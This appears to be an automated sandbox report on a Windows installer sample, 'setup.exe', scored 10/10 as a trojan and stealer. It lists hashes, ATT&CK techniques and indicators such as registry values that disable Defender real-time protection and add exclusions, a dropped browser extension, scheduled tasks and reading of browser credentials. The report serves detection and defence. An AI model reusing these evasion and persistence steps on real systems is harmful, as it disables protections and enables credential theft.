4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Analysis

max time kernel
134s
max time network
136s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11-11-2024 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PL/setup.exe
Size

7.3MB
MD5

8b036a5a7406f7227ac65f44e1827fca
SHA1

3a8499ecca8be3f69cc7163b03f3f499bbe8276f
SHA256

85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1
SHA512

91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a
SSDEEP

196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

37 2716 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid process

2608 powershell.EXE
1944 powershell.EXE
884 powershell.EXE
1588 powershell.EXE

flow	pid	process
37	2716	rundll32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

ozHEhQn.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation ozHEhQn.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeogQYHMB.exeozHEhQn.exe

pid process

996 Install.exe
2088 Install.exe
1016 ogQYHMB.exe
2660 ozHEhQn.exe
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
defense_evasion

Indirect Command Execution
T1202

Processes:

forfiles.exeforfiles.exe

pid process

2820 forfiles.exe
2752 forfiles.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation	ozHEhQn.exe

pid	process
996	Install.exe
2088	Install.exe
1016	ogQYHMB.exe
2660	ozHEhQn.exe

pid	process
2820	forfiles.exe
2752	forfiles.exe

Loads dropped DLL 12 IoCs

Processes:

setup.exeInstall.exeInstall.exerundll32.exe

pid	process
2116	setup.exe
996	Install.exe
996	Install.exe
996	Install.exe
996	Install.exe
2088	Install.exe
2088	Install.exe
2088	Install.exe
2716	rundll32.exe
2716	rundll32.exe
2716	rundll32.exe
2716	rundll32.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

ozHEhQn.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	ozHEhQn.exe

Drops file in System32 directory 19 IoCs

Processes:

ogQYHMB.exepowershell.EXEozHEhQn.exepowershell.EXEpowershell.EXErundll32.exeInstall.exepowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ogQYHMB.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	ozHEhQn.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ozHEhQn.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ogQYHMB.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	ozHEhQn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	ogQYHMB.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	ozHEhQn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	ozHEhQn.exe

Drops file in Program Files directory 13 IoCs

Processes:

ozHEhQn.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ozHEhQn.exe
File created	C:\Program Files (x86)\YNUWFfCEdUiU2\GwoTZvaaIWAwO.dll	ozHEhQn.exe
File created	C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\LgEgoZU.dll	ozHEhQn.exe
File created	C:\Program Files (x86)\QpigBxJgKxUn\BkwYORl.dll	ozHEhQn.exe
File created	C:\Program Files (x86)\oWxSecJNU\wTvaWw.dll	ozHEhQn.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	ozHEhQn.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	ozHEhQn.exe
File created	C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml	ozHEhQn.exe
File created	C:\Program Files (x86)\LsajhStaXkJRC\xCHUMIN.dll	ozHEhQn.exe
File created	C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml	ozHEhQn.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	ozHEhQn.exe
File created	C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml	ozHEhQn.exe
File created	C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml	ozHEhQn.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job	schtasks.exe
File created	C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job	schtasks.exe
File created	C:\Windows\Tasks\zeLHdclAQOoTZxj.job	schtasks.exe
File created	C:\Windows\Tasks\dBpreMcpfXbehynYz.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

schtasks.exereg.exereg.execmd.exeschtasks.exeschtasks.exeschtasks.execmd.execmd.exereg.execmd.execmd.exereg.exereg.exereg.exeschtasks.exereg.exeschtasks.exereg.exeInstall.exeschtasks.exereg.exereg.execmd.exereg.exeschtasks.exeschtasks.exereg.exereg.exeschtasks.execmd.exeschtasks.exeschtasks.execmd.exeschtasks.exereg.exereg.exeschtasks.exeschtasks.exeforfiles.exereg.exereg.exereg.exeschtasks.execmd.execmd.exeschtasks.exeschtasks.exereg.exeInstall.exereg.exereg.exewscript.exereg.exereg.exereg.exeozHEhQn.execmd.exereg.exereg.exereg.exereg.exeschtasks.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ozHEhQn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

ozHEhQn.exerundll32.exewscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\WpadNetworkName = "Network 3"	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecisionReason = "1"	ozHEhQn.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66	ozHEhQn.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\WpadDecision = "0"	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecision = "0"	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	ozHEhQn.exe
